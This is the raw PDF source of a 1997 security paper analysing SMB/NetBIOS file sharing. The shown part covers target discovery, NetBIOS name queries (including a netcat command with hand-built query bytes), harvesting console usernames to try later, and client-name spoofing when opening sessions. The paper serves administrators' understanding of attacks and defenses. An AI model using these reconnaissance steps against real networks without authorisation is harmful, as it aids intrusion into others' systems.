%PDF-1.1 %Ημ’ 4 0 obj << /Length 5 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 5 0 obj 48 endobj 6 0 obj << /Type /Font /Name /R6 /Subtype /Type1 /BaseFont /Courier >> endobj 7 0 obj << /Length 8 0 R >> stream BT /R6 10 Tf 1 0 0 1 54 711.9 Tm (
) Tj 1 0 0 1 54 701.4 Tm ( CIFS: Common Insecurities Fail Scrutiny) Tj 1 0 0 1 54 690.9 Tm ( =======================================) Tj 1 0 0 1 54 669.9 Tm ( *Hobbit*, Avian Research, hobbit@avian.org, January 1997) Tj 1 0 0 1 54 648.9 Tm (Abstract) Tj 1 0 0 1 54 638.4 Tm (========) Tj 1 0 0 1 54 617.4 Tm (An analysis of TCP/IP NetBIOS file-sharing protocols is presented, and the) Tj 1 0 0 1 54 606.9 Tm (steps involved in making a client to server SMB connection described in some) Tj 1 0 0 1 54 596.4 Tm (detail. Emphasis is placed on protocol and administrative vulnerabilities at) Tj 1 0 0 1 54 585.9 Tm (various stages and fixes/workarounds for some of them, with the hope that the) Tj 1 0 0 1 54 575.4 Tm (reader will better understand attacks and defenses alike. Several examples) Tj 1 0 0 1 54 564.9 Tm (are presented, based upon using programs from the Unix Samba package to probe) Tj 1 0 0 1 54 554.4 Tm (a target IP network and survey it for potential problems.) Tj 1 0 0 1 54 533.4 Tm (Introduction) Tj 1 0 0 1 54 522.9 Tm (============) Tj 1 0 0 1 54 501.9 Tm (We will explore the Shared Message Block protocol and related issues, at the) Tj 1 0 0 1 54 491.4 Tm (network level and higher, in the interest of presenting useful knowledge about) Tj 1 0 0 1 54 480.9 Tm (Microsoft networking [loosely aka any of CIFS, NetBEUI/NetBIOS, Lan Manager) Tj 1 0 0 1 54 470.4 Tm (compatible] security issues. Microsoft systems and applications, based on NT) Tj 1 0 0 1 54 459.9 Tm (and various flavors of Windows, are forcibly entering homes and offices the) Tj 1 0 0 1 54 449.4 Tm (world over and all expecting to speak SMB-based filesharing protocols among) Tj 1 0 0 1 54 438.9 Tm (themselves as well as with products from other vendors. As the network) Tj 1 0 0 1 54 428.4 Tm (security community has come to expect from most commercial offerings, these) Tj 1 0 0 1 54 417.9 Tm (systems are distributed with poorly configured security settings which are) Tj 1 0 0 1 54 407.4 Tm (seldom changed or even reviewed by their new owners before being plugged into) Tj 1 0 0 1 54 396.9 Tm (the Internet. This leaves many of them vulnerable to trivial attacks, and) Tj 1 0 0 1 54 386.4 Tm (administrators who *do* try to address the security issues often miss or) Tj 1 0 0 1 54 375.9 Tm (misconfigure things, perhaps making their systems less obviously vulnerable) Tj 1 0 0 1 54 365.4 Tm (but nonetheless still vulnerable. A major factor in the difficulty is that) Tj 1 0 0 1 54 354.9 Tm (many security practitioners are venturing into new territory here, which) Tj 1 0 0 1 54 344.4 Tm (turns out to be riddled with unexpected and undocumented pitfalls. People) Tj 1 0 0 1 54 333.9 Tm (relatively new to the overall networking security field, including many of) Tj 1 0 0 1 54 323.4 Tm (those implementing and installing said operating systems, often lack the) Tj 1 0 0 1 54 312.9 Tm (experience gained from other OSes and environments and have no idea where to) Tj 1 0 0 1 54 302.4 Tm (look for potential problems.) Tj 1 0 0 1 54 281.4 Tm (No specific audience is targeted here, but administrators with a primarily) Tj 1 0 0 1 54 270.9 Tm (Unix and NFS background that are now being asked to also support Windows and) Tj 1 0 0 1 54 260.4 Tm (NT environments may benefit the most from this. A necessarily Unix-centric) Tj 1 0 0 1 54 249.9 Tm (viewpoint is taken, since that is where the author's main strengths are, but) Tj 1 0 0 1 54 239.4 Tm (more importantly because Unix-based source code for a protocol implementation) Tj 1 0 0 1 54 228.9 Tm (is freely available. Andy Tridgell's Samba package represents an amazing) Tj 1 0 0 1 54 218.4 Tm (amount of very solid and still-evolving work, and allows Unix systems to) Tj 1 0 0 1 54 207.9 Tm (interoperate with Microsoft and Lan Manager platforms to access files and) Tj 1 0 0 1 54 197.4 Tm (other resources over TCP/IP networks. The examples and discussion herein) Tj 1 0 0 1 54 186.9 Tm (refer to the "stable release" version 1.9.15 patchlevel 8 of Samba, with) Tj 1 0 0 1 54 176.4 Tm (some minimal modifications geared toward exploring the security aspects) Tj 1 0 0 1 54 165.9 Tm (of the protocol. While not the latest release, it suffices here, and the) Tj 1 0 0 1 54 155.4 Tm (documentation that comes with it is highly recommended reading. The evolving) Tj 1 0 0 1 54 144.9 Tm (Internet-draft for the Common Internet File System, or CIFS, is also a key) Tj 1 0 0 1 54 134.4 Tm (reference work that expands upon original or "core" SMB and explains most of) Tj 1 0 0 1 54 123.9 Tm (what the boys in Redmond hope will become a full Internet standard. Their own) Tj 1 0 0 1 54 113.4 Tm (implementations mostly adhere to the draft, and many other vendors already) Tj 1 0 0 1 54 102.9 Tm (support CIFS or some subset thereof. A few issues specific to NT necessarily) Tj 1 0 0 1 54 92.4 Tm (appear, but NT security itself is a whole different bucket of worms and is) Tj 1 0 0 1 54 81.9 Tm (mostly outside the scope of this text.) Tj ET Q endstream endobj 8 0 obj 5076 endobj 3 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R6 6 0 R >> >> /Contents [ 4 0 R 7 0 R ] >> endobj 10 0 obj << /Length 11 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 11 0 obj 48 endobj 12 0 obj << /Type /Font /Name /R12 /Subtype /Type1 /BaseFont /Courier >> endobj 13 0 obj << /Length 14 0 R >> stream BT /R12 10 Tf 1 0 0 1 54 708.9 Tm (So far there seems to be very little hard information available about this,) Tj 1 0 0 1 54 698.4 Tm (although I am aware of at least one other ongoing related effort. Several) Tj 1 0 0 1 54 687.9 Tm (megabytes of NT-security archives, random whitepapers, RFCs, the CIFS spec,) Tj 1 0 0 1 54 677.4 Tm (the Samba stuff, a few MS knowledge-base articles, strings extracted from) Tj 1 0 0 1 54 666.9 Tm (binaries, and packet dumps have been dutifully waded through during the) Tj 1 0 0 1 54 656.4 Tm (information-gathering stages of this project, and there are *still* many) Tj 1 0 0 1 54 645.9 Tm (missing pieces. Some compatible platforms were unavailable for testing,) Tj 1 0 0 1 54 635.4 Tm (notably OS/2. While often tedious, at least the way has been generously) Tj 1 0 0 1 54 624.9 Tm (littered with occurrences of clapping hand to forehead and muttering "crikey,) Tj 1 0 0 1 54 614.4 Tm (what are they *thinking*?!" The intent is not to compete against other works) Tj 1 0 0 1 54 603.9 Tm (in progress, it is rather to aid them in moving forward.) Tj 1 0 0 1 54 582.9 Tm (This document may be freely copied and quoted in whole or part, provided that) Tj 1 0 0 1 54 572.4 Tm (proper attribution is included. Many of the ideas contained herein are not) Tj 1 0 0 1 54 561.9 Tm (new, although it is possible that one or two hitherto unknown problems or) Tj 1 0 0 1 54 551.4 Tm (methods have been independently discovered. The point is to collect the) Tj 1 0 0 1 54 540.9 Tm (information into one place and describe a stepwise procedure for evaluating) Tj 1 0 0 1 54 530.4 Tm (this type of network environment, in a way that those of us who have hitherto) Tj 1 0 0 1 54 519.9 Tm (mostly shunned any dealings with Microsoft and other PC network products can) Tj 1 0 0 1 54 509.4 Tm (readily understand.) Tj 1 0 0 1 54 488.4 Tm (Groundwork: What's out there?) Tj 1 0 0 1 54 477.9 Tm (=============================) Tj 1 0 0 1 54 456.9 Tm (Little needs to be said here. Given a target network or set of IP addresses,) Tj 1 0 0 1 54 446.4 Tm (well-known methods can be used for finding the target hosts -- the procedure) Tj 1 0 0 1 54 435.9 Tm (which at least one large contractor refers to as "network contour assessment.") Tj 1 0 0 1 54 425.4 Tm (DNS zone dumps in conjunction with tools such as "fping" can quickly locate) Tj 1 0 0 1 54 414.9 Tm (active machines. To specifically locate potential SMB servers, scanning for) Tj 1 0 0 1 54 404.4 Tm (TCP port 139 is a fairly safe bet. In the absence of packet filtering,) Tj 1 0 0 1 54 393.9 Tm (connection attempts there either open or get refused so it is unnecessary to) Tj 1 0 0 1 54 383.4 Tm (wait around for long timeouts. If machines respond to pinging or other) Tj 1 0 0 1 54 372.9 Tm (connectivity tests but TCP connections to 139 time out, then it is likely that) Tj 1 0 0 1 54 362.4 Tm (there is a packet filter in the way protecting against NetBIOS traffic. A) Tj 1 0 0 1 54 351.9 Tm (Unix parallel would be running something like "rpcinfo -p" against a set of) Tj 1 0 0 1 54 341.4 Tm (targets to find NFS servers, which may or may not be protected by a filter) Tj 1 0 0 1 54 330.9 Tm (blocking traffic to the portmapper at TCP/UDP 111.) Tj 1 0 0 1 54 309.9 Tm (We will therefore assume having collected a list of potential SMB servers, and) Tj 1 0 0 1 54 299.4 Tm (proceed to attack a single target therein. Note however that information) Tj 1 0 0 1 54 288.9 Tm (gleaned from neighboring machines may be useful, just as in the traditional) Tj 1 0 0 1 54 278.4 Tm (Unix-based environment. Remembering various information about a network as a) Tj 1 0 0 1 54 267.9 Tm (whole and plugging it back into specific host attacks is a classic approach) Tj 1 0 0 1 54 257.4 Tm (amply detailed in numerous papers.) Tj 1 0 0 1 54 236.4 Tm (Phase 0: Name determination) Tj 1 0 0 1 54 225.9 Tm (===========================) Tj 1 0 0 1 54 204.9 Tm (To establish an SMB session to a typical target, one must not only have its IP) Tj 1 0 0 1 54 194.4 Tm (address but also know its "computer name." This is an arbitrary name similar) Tj 1 0 0 1 54 183.9 Tm (to a DNS hostname assigned by an administrator, unique within an organization) Tj 1 0 0 1 54 173.4 Tm (or at least a given LAN, and in many installations the computername and DNS) Tj 1 0 0 1 54 162.9 Tm (name are the same for administrative convenience. Name resolution is by) Tj 1 0 0 1 54 152.4 Tm (definition a separate entity from SMB itself, and employs a variety of methods) Tj 1 0 0 1 54 141.9 Tm (including static files, DNS, WINS, and local-wire broadcasts. When a machine) Tj 1 0 0 1 54 131.4 Tm (is running NetBIOS over TCP/IP, or "NBT", it attaches its own little name) Tj 1 0 0 1 54 120.9 Tm (service to UDP port 137, which makes a continual effort to both locate and) Tj 1 0 0 1 54 110.4 Tm (disseminate as much info as it can about services on the local LAN. One of) Tj 1 0 0 1 54 99.9 Tm (its functions is periodically broadcasting its own set of names on to the) Tj 1 0 0 1 54 89.4 Tm (local wire, to notify immediate neighbors that it exists and offers services.) Tj 1 0 0 1 54 78.9 Tm (IP routers generally do not forward these broadcasts, so passive receivers) Tj ET Q endstream endobj 14 0 obj 5239 endobj 9 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R12 12 0 R >> >> /Contents [ 10 0 R 13 0 R ] >> endobj 16 0 obj << /Length 17 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 17 0 obj 48 endobj 18 0 obj << /Type /Font /Name /R18 /Subtype /Type1 /BaseFont /Courier >> endobj 19 0 obj << /Length 20 0 R >> stream BT /R18 10 Tf 1 0 0 1 54 711.9 Tm (outside an immediate subnet will not learn these names or which IP hosts they) Tj 1 0 0 1 54 701.4 Tm (belong to. Fortunately there is usually an easy way to remotely determine the) Tj 1 0 0 1 54 690.9 Tm (name, known as a "node status query." The name service also replies to direct) Tj 1 0 0 1 54 680.4 Tm (queries about certain names associated with its own particular host, and if it) Tj 1 0 0 1 54 669.9 Tm (is running as a WINS server it can give out even more information.) Tj 1 0 0 1 54 648.9 Tm (There are two basic query types -- IP address, and node status. Status query) Tj 1 0 0 1 54 638.4 Tm (might be more properly called name query, since sending one should elicit an) Tj 1 0 0 1 54 627.9 Tm (answer containing all of a target's NetBIOS names. Both are remarkably) Tj 1 0 0 1 54 617.4 Tm (similar in structure to DNS queries, and are indeed a variant of the DNS) Tj 1 0 0 1 54 606.9 Tm (protocol itself. A NetBIOS address query is for resource record type 32 and a) Tj 1 0 0 1 54 596.4 Tm (status query is type 33; both of class IN or 1. With traditional NetBEUI over) Tj 1 0 0 1 54 585.9 Tm (non-IP transports such as with local-LAN IPX, computer names are normally) Tj 1 0 0 1 54 575.4 Tm (uppercase, 16 bytes long, and padded with spaces which are illegal characters) Tj 1 0 0 1 54 564.9 Tm (in the DNS spec for hostnames. To get around this in IP environments, NetBIOS) Tj 1 0 0 1 54 554.4 Tm (names are mangled into a rather bizarre format. The official spec for this is) Tj 1 0 0 1 54 543.9 Tm (in RFCs 1001 and 1002, but to quickly sum it up: Each ASCII character in a) Tj 1 0 0 1 54 533.4 Tm (name is split into 4-bit halves, and each half is added to ascii value 0x41) Tj 1 0 0 1 54 522.9 Tm ([uppercase "A"] to form a new byte. Each original character therefore becomes) Tj 1 0 0 1 54 512.4 Tm (two mangled characters in the range A-P, doubling the entire length to 32) Tj 1 0 0 1 54 501.9 Tm (bytes. Thus, the name "FEH" gets padded out with spaces and becomes) Tj 1 0 0 1 54 480.9 Tm ( ascii string "FEH " -- is) Tj 1 0 0 1 54 470.4 Tm ( hex 46 45 48 20 20 20 20 20 20 20 20 20 20 20 20 20 -- split into) Tj 1 0 0 1 54 459.9 Tm ( hex 4 6 4 5 4 8 2 0 2 0 2 0 2 0 2 0 2 0 ...etc... -- add to "A" gives) Tj 1 0 0 1 54 449.4 Tm ( hex 45 47 45 46 45 49 43 41 43 41 43 41 ...etc... -- which is) Tj 1 0 0 1 54 438.9 Tm ( mangled string "EGEFEICACACACACACACACACACACACACA") Tj 1 0 0 1 54 417.9 Tm (The name_mangle\(\) routine in Samba's util.c does this translation. The) Tj 1 0 0 1 54 407.4 Tm (characteristic "...CACACACA" string trailer makes NetBIOS names easily) Tj 1 0 0 1 54 396.9 Tm (recognizable when they show up in packet dumps and such. Of particular) Tj 1 0 0 1 54 386.4 Tm (interest is the wildcard name "*", but padded with *nulls* instead of spaces.) Tj 1 0 0 1 54 375.9 Tm (This mangles to "CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". Under most circumstances,) Tj 1 0 0 1 54 365.4 Tm (name-service listeners are required to reply to queries for this wildcard name) Tj 1 0 0 1 54 354.9 Tm (as well as for their own computernames. Therefore sending a status query) Tj 1 0 0 1 54 344.4 Tm (for this "*" name is very likely to produce a name reply as resource records) Tj 1 0 0 1 54 333.9 Tm (containing the target's NetBIOS names, which oddly enough come back in) Tj 1 0 0 1 54 323.4 Tm (*non-mangled* format. Multiple copies of some names usually show up, but they) Tj 1 0 0 1 54 312.9 Tm (are subtly different. In practice the 16th byte of a non-mangled name is a) Tj 1 0 0 1 54 302.4 Tm (type byte, which is a different animal from a DNS resource-record type! When) Tj 1 0 0 1 54 291.9 Tm (a NetBIOS machine comes up its "name registration" broadcasts contain multiple) Tj 1 0 0 1 54 281.4 Tm (instances of its own name and other strings, but with several different) Tj 1 0 0 1 54 270.9 Tm (*NetBIOS* name types that can indicate different services. Note herein that) Tj 1 0 0 1 54 260.4 Tm (mangled names are of length 32 or 0x20, address queries are RR type 32, and) Tj 1 0 0 1 54 249.9 Tm (several returned names have *type* 0x20. Therefore a lot of 0x20s show up in) Tj 1 0 0 1 54 239.4 Tm (these DNS-style packets and can make things rather confusing. There seem to) Tj 1 0 0 1 54 228.9 Tm (be many name types, not particularly well documented except maybe in knowledge) Tj 1 0 0 1 54 218.4 Tm (bases or resource kits, but the important ones are) Tj 1 0 0 1 54 197.4 Tm ( 0x00 base computernames and workgroups, also in "*" queries) Tj 1 0 0 1 54 186.9 Tm ( 0x01 master browser, in magic __MSBROWSE__ cookie) Tj 1 0 0 1 54 176.4 Tm ( 0x03 messaging/alerter service; name of logged-in user) Tj 1 0 0 1 54 165.9 Tm ( 0x20 resource-sharing "server service" name) Tj 1 0 0 1 54 155.4 Tm ( 0x1B domain master-browser name) Tj 1 0 0 1 54 144.9 Tm ( 0x1C domain controller name) Tj 1 0 0 1 54 134.4 Tm ( 0x1E domain/workgroup master browser election announcement [?]) Tj 1 0 0 1 54 113.4 Tm (The mangling example above has 0x20 as its type byte, therefore building the) Tj 1 0 0 1 54 102.9 Tm (name variant used when connecting to fileservers. Server and workstation) Tj 1 0 0 1 54 92.4 Tm (machines alike can provide various different services, and are thus usually) Tj 1 0 0 1 54 81.9 Tm (aware of more than one name/type at once. In fact most of them return a group) Tj ET Q endstream endobj 20 0 obj 5482 endobj 15 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R18 18 0 R >> >> /Contents [ 16 0 R 19 0 R ] >> endobj 22 0 obj << /Length 23 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 23 0 obj 48 endobj 24 0 obj << /Type /Font /Name /R24 /Subtype /Type1 /BaseFont /Courier >> endobj 25 0 obj << /Length 26 0 R >> stream BT /R24 10 Tf 1 0 0 1 54 711.9 Tm (of five or so in a status reply, including the base computer name and whatever) Tj 1 0 0 1 54 701.4 Tm ("workgroup" the target is a member of. Name type 0 should be used with the) Tj 1 0 0 1 54 690.9 Tm (special "*" query which is null-padded anyway, or a response is unlikely. If) Tj 1 0 0 1 54 680.4 Tm (NO name of type 0x20 is present in the list, it is unlikely that the machine) Tj 1 0 0 1 54 669.9 Tm (in question has been configured to share any of its own resources and attempts) Tj 1 0 0 1 54 659.4 Tm (to connect sessions to it will likely fail. Name type 0x3 in the reply often) Tj 1 0 0 1 54 648.9 Tm (reveals the username logged in at the machine's console, and should be) Tj 1 0 0 1 54 638.4 Tm (collected as a potential username to try against this or neighboring targets.) Tj 1 0 0 1 54 627.9 Tm (The base name may also be the same as a username, since in typical small) Tj 1 0 0 1 54 617.4 Tm (office environments the machines are often associated with specific people.) Tj 1 0 0 1 54 606.9 Tm (The special name "^A^B__MSBROWSE__^B^A" [last char being control-A, or type 1]) Tj 1 0 0 1 54 596.4 Tm (indicates a "master browser" which is a machine that collects info about) Tj 1 0 0 1 54 585.9 Tm (neighboring machines -- in particular, their IP addresses. A master browser) Tj 1 0 0 1 54 575.4 Tm (is a fortunate find since we can likely get a "browse list" from that machine) Tj 1 0 0 1 54 564.9 Tm ([described later] and then possibly query that same target for all the other) Tj 1 0 0 1 54 554.4 Tm (names and addresses it claims to know about.) Tj 1 0 0 1 54 533.4 Tm (One can do "nbtstat -A {ip-addr}" from a Microsoft platform to direct "*") Tj 1 0 0 1 54 522.9 Tm (queries to a specific IP-aware target and obtain its name list. In the) Tj 1 0 0 1 54 512.4 Tm (absence of a mapping in an LMHOSTS file or some other mechanism, a specific) Tj 1 0 0 1 54 501.9 Tm (machine can be found using "nbtstat -a \\\\NAME" if it is on the local wire. An) Tj 1 0 0 1 54 491.4 Tm (address query is sent to the broadcast address of the connected subnet, and if) Tj 1 0 0 1 54 480.9 Tm (a machine responds then a unicast status query is sent to it. For reasons) Tj 1 0 0 1 54 470.4 Tm (unfathomable Microsoft platforms usually send status replies FROM UDP 137 TO) Tj 1 0 0 1 54 459.9 Tm (UDP 137, regardless of the UDP source ports of query packets, so the querying) Tj 1 0 0 1 54 449.4 Tm (application must locally bind to 137 [requiring root on Unix boxes] to ensure) Tj 1 0 0 1 54 438.9 Tm (that replies can be received. Oddly enough, *address* replies are normally) Tj 1 0 0 1 54 428.4 Tm (returned to whatever source port the query was from! To handle this fine) Tj 1 0 0 1 54 417.9 Tm (example of the IP savvy out there in Redmond, a tiny patch is needed for the) Tj 1 0 0 1 54 407.4 Tm ("nmblookup" Samba program, which as it comes grabs a high port and is unlikely) Tj 1 0 0 1 54 396.9 Tm (to receive status replies. It will then work similarly to "nbtstat" when run) Tj 1 0 0 1 54 386.4 Tm (as root, sending the "*" query if given the "-S \\*" argument [quoting "*" to) Tj 1 0 0 1 54 375.9 Tm (the shell], and also accepts a *unicast* target IP as the -B argument.) Tj 1 0 0 1 54 365.4 Tm (Nmblookup also has an interesting feature that allows setting the hex name) Tj 1 0 0 1 54 354.9 Tm (type in a query -- for example, a name of the form "TARGET#1C" forces the name) Tj 1 0 0 1 54 344.4 Tm (type to be 0x1C. A slightly more "raw" equivalent of the generic "*" query,) Tj 1 0 0 1 54 333.9 Tm (which sometimes elicits a response containing no names but a response) Tj 1 0 0 1 54 323.4 Tm (nonetheless, can be done using netcat to locally bind UDP port 137 and send a) Tj 1 0 0 1 54 312.9 Tm (query. Feed the following input bytes into "nc -v -u -w 3 -p 137 target 137") Tj 1 0 0 1 54 302.4 Tm (and the output through "cat -v":) Tj 1 0 0 1 54 281.4 Tm ( 0x00 # . 1) Tj 1 0 0 1 54 270.9 Tm ( 0x03 # . 2 # xid) Tj 1 0 0 1 54 260.4 Tm ( 0x00 # . 3) Tj 1 0 0 1 54 249.9 Tm ( 0x00 # . 4 # flags) Tj 1 0 0 1 54 239.4 Tm ( 0x00 # . 5) Tj 1 0 0 1 54 228.9 Tm ( 0x01 # . 6 # qcnt) Tj 1 0 0 1 54 218.4 Tm ( 0x00 # . 7) Tj 1 0 0 1 54 207.9 Tm ( 0x00 # . 8 # rcnt) Tj 1 0 0 1 54 197.4 Tm ( 0x00 # . 9) Tj 1 0 0 1 54 186.9 Tm ( 0x00 # . 10 # nscnt) Tj 1 0 0 1 54 176.4 Tm ( 0x00 # . 11) Tj 1 0 0 1 54 165.9 Tm ( 0x00 # . 12 # acnt) Tj 1 0 0 1 54 155.4 Tm ( 0x20 # 13 # namelen) Tj 1 0 0 1 54 144.9 Tm ( 0x43 # C 14 # mangled "*" ...) Tj 1 0 0 1 54 134.4 Tm ( 0x4b # K 15) Tj 1 0 0 1 54 123.9 Tm ( 0x41 # A 16) Tj 1 0 0 1 54 113.4 Tm ( 0x41 # A 17) Tj 1 0 0 1 54 102.9 Tm ( 0x41 # A 18) Tj 1 0 0 1 54 92.4 Tm ( 0x41 # A 19) Tj 1 0 0 1 54 81.9 Tm ( 0x41 # A 20) Tj ET Q endstream endobj 26 0 obj 4897 endobj 21 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R24 24 0 R >> >> /Contents [ 22 0 R 25 0 R ] >> endobj 28 0 obj << /Length 29 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 29 0 obj 48 endobj 30 0 obj << /Type /Font /Name /R30 /Subtype /Type1 /BaseFont /Courier >> endobj 31 0 obj << /Length 32 0 R >> stream BT /R30 10 Tf 1 0 0 1 54 711.9 Tm ( 0x41 # A 21) Tj 1 0 0 1 54 701.4 Tm ( 0x41 # A 22) Tj 1 0 0 1 54 690.9 Tm ( 0x41 # A 23) Tj 1 0 0 1 54 680.4 Tm ( 0x41 # A 24) Tj 1 0 0 1 54 669.9 Tm ( 0x41 # A 25) Tj 1 0 0 1 54 659.4 Tm ( 0x41 # A 26) Tj 1 0 0 1 54 648.9 Tm ( 0x41 # A 27) Tj 1 0 0 1 54 638.4 Tm ( 0x41 # A 28) Tj 1 0 0 1 54 627.9 Tm ( 0x41 # A 29) Tj 1 0 0 1 54 617.4 Tm ( 0x41 # A 30) Tj 1 0 0 1 54 606.9 Tm ( 0x41 # A 31) Tj 1 0 0 1 54 596.4 Tm ( 0x41 # A 32) Tj 1 0 0 1 54 585.9 Tm ( 0x41 # A 33) Tj 1 0 0 1 54 575.4 Tm ( 0x41 # A 34) Tj 1 0 0 1 54 564.9 Tm ( 0x41 # A 35) Tj 1 0 0 1 54 554.4 Tm ( 0x41 # A 36) Tj 1 0 0 1 54 543.9 Tm ( 0x41 # A 37) Tj 1 0 0 1 54 533.4 Tm ( 0x41 # A 38) Tj 1 0 0 1 54 522.9 Tm ( 0x41 # A 39) Tj 1 0 0 1 54 512.4 Tm ( 0x41 # A 40) Tj 1 0 0 1 54 501.9 Tm ( 0x41 # A 41) Tj 1 0 0 1 54 491.4 Tm ( 0x41 # A 42) Tj 1 0 0 1 54 480.9 Tm ( 0x41 # A 43) Tj 1 0 0 1 54 470.4 Tm ( 0x41 # A 44) Tj 1 0 0 1 54 459.9 Tm ( 0x41 # A 45 # [embedded type byte]) Tj 1 0 0 1 54 449.4 Tm ( 0x00 # . 46 # terminator) Tj 1 0 0 1 54 438.9 Tm ( 0x00 # . 47) Tj 1 0 0 1 54 428.4 Tm ( 0x21 # ! 48 # querytype NBTSTAT) Tj 1 0 0 1 54 417.9 Tm ( 0x00 # . 49) Tj 1 0 0 1 54 407.4 Tm ( 0x01 # . 50 # class IN) Tj 1 0 0 1 54 386.4 Tm (In rare cases, an additional "scope ID" may be tacked on to mangled names in) Tj 1 0 0 1 54 375.9 Tm (the format "EGEFEICACACACACACACACACACACACACA.scope" just like in multipart DNS) Tj 1 0 0 1 54 365.4 Tm (names. A scope does not contain spaces, and therefore can and indeed is sent) Tj 1 0 0 1 54 354.9 Tm (unchanged in hostname queries. Scope names are further discussed later under) Tj 1 0 0 1 54 344.4 Tm ("defenses", since they can play a role therein.) Tj 1 0 0 1 54 323.4 Tm (Firing "*" queries at either selected hosts or the IP subnet's directed) Tj 1 0 0 1 54 312.9 Tm (broadcast is another way of probing around for active SMB hosts. Most routers) Tj 1 0 0 1 54 302.4 Tm (do not forward directed-subnet broadcast, but ones that do may get you all the) Tj 1 0 0 1 54 291.9 Tm (answers in one or two shots! In most cases, scanning for TCP port 139 and) Tj 1 0 0 1 54 281.4 Tm (following up with unicast UDP status queries is still likely to be faster and) Tj 1 0 0 1 54 270.9 Tm (more reliable, especially when a target for some reason won't respond to "*") Tj 1 0 0 1 54 260.4 Tm (queries. This sometimes happens if the messaging or alerter service is shut) Tj 1 0 0 1 54 249.9 Tm (down on the target, which is one recommended security procedure in several) Tj 1 0 0 1 54 239.4 Tm (documents. If you suspect this case, try asking for "WORKGROUP", parts of the) Tj 1 0 0 1 54 228.9 Tm (target's DNS name, and other likely strings like variants on the name of the) Tj 1 0 0 1 54 218.4 Tm (organization or people within it. Status-querying explicitly for a machine's) Tj 1 0 0 1 54 207.9 Tm (name or workgroup using type 0 should also cause it to respond, and a lack of) Tj 1 0 0 1 54 197.4 Tm (any type 0x3 names in the list would confirm that messaging is disabled.) Tj 1 0 0 1 54 186.9 Tm (Whether due to packet filters or some other reason, getting *no* reply for) Tj 1 0 0 1 54 176.4 Tm (all this effort is still not a reason to give up -- it is UDP after all, and) Tj 1 0 0 1 54 165.9 Tm (further name guesses can be plugged in during the next phase.) Tj 1 0 0 1 54 144.9 Tm (Phase 1: The TCP session) Tj 1 0 0 1 54 134.4 Tm (========================) Tj 1 0 0 1 54 113.4 Tm (Next we open a TCP connection to port 139 on the target. There is no longer a) Tj 1 0 0 1 54 102.9 Tm (need for any special local ports, so smbclient can run as a normal Unix user.) Tj 1 0 0 1 54 92.4 Tm (The "called" target's computername of the appropriate type and the "caller") Tj 1 0 0 1 54 81.9 Tm (client name are name-mangled and plugged into a Session Request block sent to) Tj ET Q endstream endobj 32 0 obj 4057 endobj 27 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R30 30 0 R >> >> /Contents [ 28 0 R 31 0 R ] >> endobj 34 0 obj << /Length 35 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 35 0 obj 48 endobj 36 0 obj << /Type /Font /Name /R36 /Subtype /Type1 /BaseFont /Courier >> endobj 37 0 obj << /Length 38 0 R >> stream BT /R36 10 Tf 1 0 0 1 54 711.9 Tm (the server. The idea here is to sanity-check the name determination step and) Tj 1 0 0 1 54 701.4 Tm (ensure that one is conversing with the correct machine -- especially wise in) Tj 1 0 0 1 54 690.9 Tm (the inevitable cases of outdated LMHOSTS files or DNS data. If the target) Tj 1 0 0 1 54 680.4 Tm (server's name is right a "positive response" is sent back, and the connection) Tj 1 0 0 1 54 669.9 Tm (remains open. If the wrong server name is passed in, a "negative response" is) Tj 1 0 0 1 54 659.4 Tm (sent along with an error code, and the server end of the connection starts a) Tj 1 0 0 1 54 648.9 Tm (TCP shutdown by sending a FIN. Nothing further can be done with the failed) Tj 1 0 0 1 54 638.4 Tm (connection; a new one must be opened to try a different servername. The name) Tj 1 0 0 1 54 627.9 Tm (of the connecting client is largely irrelevant and can even be null, although) Tj 1 0 0 1 54 617.4 Tm (its name type is generally 0. However, the name the client supplies is the) Tj 1 0 0 1 54 606.9 Tm (name that gets logged during later phases such as user logins. The client) Tj 1 0 0 1 54 596.4 Tm (name may also affect behavior against NT machines which have such settable) Tj 1 0 0 1 54 585.9 Tm (parameters as which workstations a given user may log in from. It appears) Tj 1 0 0 1 54 575.4 Tm (that the source IP address is *completely* irrelevant to Microsoft-based) Tj 1 0 0 1 54 564.9 Tm (servers, which simply accept the given client name. This is a first hint) Tj 1 0 0 1 54 554.4 Tm (about how much functionality is left up to the client. A vague Unix parallel) Tj 1 0 0 1 54 543.9 Tm (might be faking the client hostname in mount requests to be something in the) Tj 1 0 0 1 54 533.4 Tm (target's export list, which usually worked against early NFS implementations.) Tj 1 0 0 1 54 512.4 Tm (This session request is only the first of many steps taken behind the scenes) Tj 1 0 0 1 54 501.9 Tm (by most client commands. From a command prompt on a Microsoft box one does) Tj 1 0 0 1 54 491.4 Tm ("net use \\\\TARGET\\SHARENAME" to begin access to a filesystem, or "net view) Tj 1 0 0 1 54 480.9 Tm (\\\\TARGET" to see a target's list of available services. Samba's "smbclient") Tj 1 0 0 1 54 470.4 Tm (accepts the same syntax, although the backslashes need to be isolated from) Tj 1 0 0 1 54 459.9 Tm (the shell by enclosing in quotes or specifying \\\\\\\\TARGET\\\\RESOURCE. It also) Tj 1 0 0 1 54 449.4 Tm (accepts "-L TARGET" to list the available resources, which in any case is) Tj 1 0 0 1 54 438.9 Tm (what we want to do first. Smbclient by default picks up the caller name) Tj 1 0 0 1 54 428.4 Tm (from the hostname of the Unix machine it is running on, but we can specify) Tj 1 0 0 1 54 417.9 Tm ("-n fakename" to set it to something arbitrary.) Tj 1 0 0 1 54 396.9 Tm (An error response is usually one of two: either the passed servername wasn't) Tj 1 